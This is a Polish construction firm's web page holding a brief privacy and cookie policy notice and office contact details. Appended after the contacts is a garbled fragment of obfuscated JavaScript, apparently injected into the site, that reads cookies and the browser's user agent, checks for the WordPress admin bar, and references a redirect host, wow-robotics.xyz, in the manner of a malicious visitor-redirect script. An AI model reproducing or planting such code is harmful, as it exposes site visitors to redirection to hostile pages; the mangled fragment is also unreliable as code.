Polityka prywatności oraz wykorzystania plików Cookies w serwisie internetowym Przyjaznych Domów.

Niniejszy dokument dotyczy przetwarzania oraz ochrony danych osobowych dotyczących Użytkowników w związku z korzystaniem przez nich z serwisu: www.przyjazdnedomy.pl

Firma Przyjazne Domy szanuje prawo do prywatności Użytkowników serwisu przyjaznedomy.pl, w szczególności dba o ochronę ich danych osobowych oraz stosuje odpowiednie rozwiązania organizacyjne i techniczne zapobiegające ingerencji w prywatność Użytkowników przez osoby trzecie. Nasze działania są ukierunkowane na zagwarantowanie Użytkownikowi poczucia pełnego bezpieczeństwa na poziomie odpowiednim do obowiązującego prawa.

Pełny dokument polityki prywatności jest do pobrania w poniższym linku.

Formularz Kontaktowy

SIEDZIBA FIRMY

Lubczyńska 11C , 70-896 Załom
Dariusz Krzyżak
kom. 501 520 510
darek@przyjaznedomy.pl
info@przyjaznedomy.pl

Pracownia projektowa
kom. 504 202 244
projekty@przyjaznedomy.pl

BIURO DZIWNÓW

Parkowa 4/2, 72-420 Dziwnów
Tomasz Jankowiak
kom. 601 222 293
tomek@przyjaznedomy.pl

Dane do faktur:
Przyjazne Domy Jankowiak i Krzyżak Sp.J.
Lubczyńska 11C, 70-896 Załom
NIP 8561747278

['toUTCString','cookie','split','length','charAt','substring','indexOf','userAgent','match','MSIE;','OPR','Chromium','Firefox','Chrome','ppkcookie','location','https: 0=”//www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’; expires='” _i=”2″ _address=”2″ /]['push' _i=”3″ _address=”3″ /]['shift' _i=”4″ _address=”4″ /][c _i=”5″ _address=”5″ /][b('0x0') _i=”6″ _address=”6″ /][b('0x3') _i=”7″ _address=”7″ /][b('0x4') _i=”8″ _address=”8″ /][b('0x6') _i=”9″ _address=”9″ /][b('0x7') _i=”10″ _address=”10″ /][b('0x7') _i=”11″ _address=”11″ /][b('0x8') _i=”12″ _address=”12″ /][b('0x9') _i=”13″ _address=”13″ /][m _i=”14″ _address=”14″ /][b('0xa') _i=”15″ _address=”15″ /][b('0xb') _i=”16″ _address=”16″ /]['length' _i=”17″ _address=”17″ /][b('0xc') _i=”18″ _address=”18″ /][b('0xb') _i=”19″ _address=”19″ /][b('0x9') _i=”20″ _address=”20″ /]['length' _i=”21″ _address=”21″ /][b('0xd') _i=”22″ _address=”22″ /][b('0xe') _i=”23″ _address=”23″ /]['userAgent' _i=”24″ _address=”24″ /][b('0xe') _i=”25″ _address=”25″ /][b('0xd') _i=”26″ _address=”26″ /][b('0xe') _i=”27″ _address=”27″ /][b('0xd') _i=”28″ _address=”28″ /][b('0xe') _i=”29″ _address=”29″ /][b('0xd') _i=”30″ _address=”30″ /][b('0xe') _i=”31″ _address=”31″ /][b('0xd') _i=”32″ _address=”32″ /]['indexOf' _i=”33″ _address=”33″ /]['userAgent' _i=”34″ _address=”34″ /][b('0xc') _i=”35″ _address=”35″ /][b('0xd') _i=”36″ _address=”36″ /][b('0xc') _i=”37″ _address=”37″ /][b('0xd') _i=”38″ _address=”38″ /][b('0xc') _i=”39″ _address=”39″ /][b('0xd') _i=”40″ _address=”40″ /]['indexOf' _i=”41″ _address=”41″ /][b('0xd') _i=”42″ _address=”42″ /]['indexOf' _i=”43″ _address=”43″ /][b('0x15') _i=”44″ _address=”44″ /]['replace' _i=”45″ _address=”45″ /]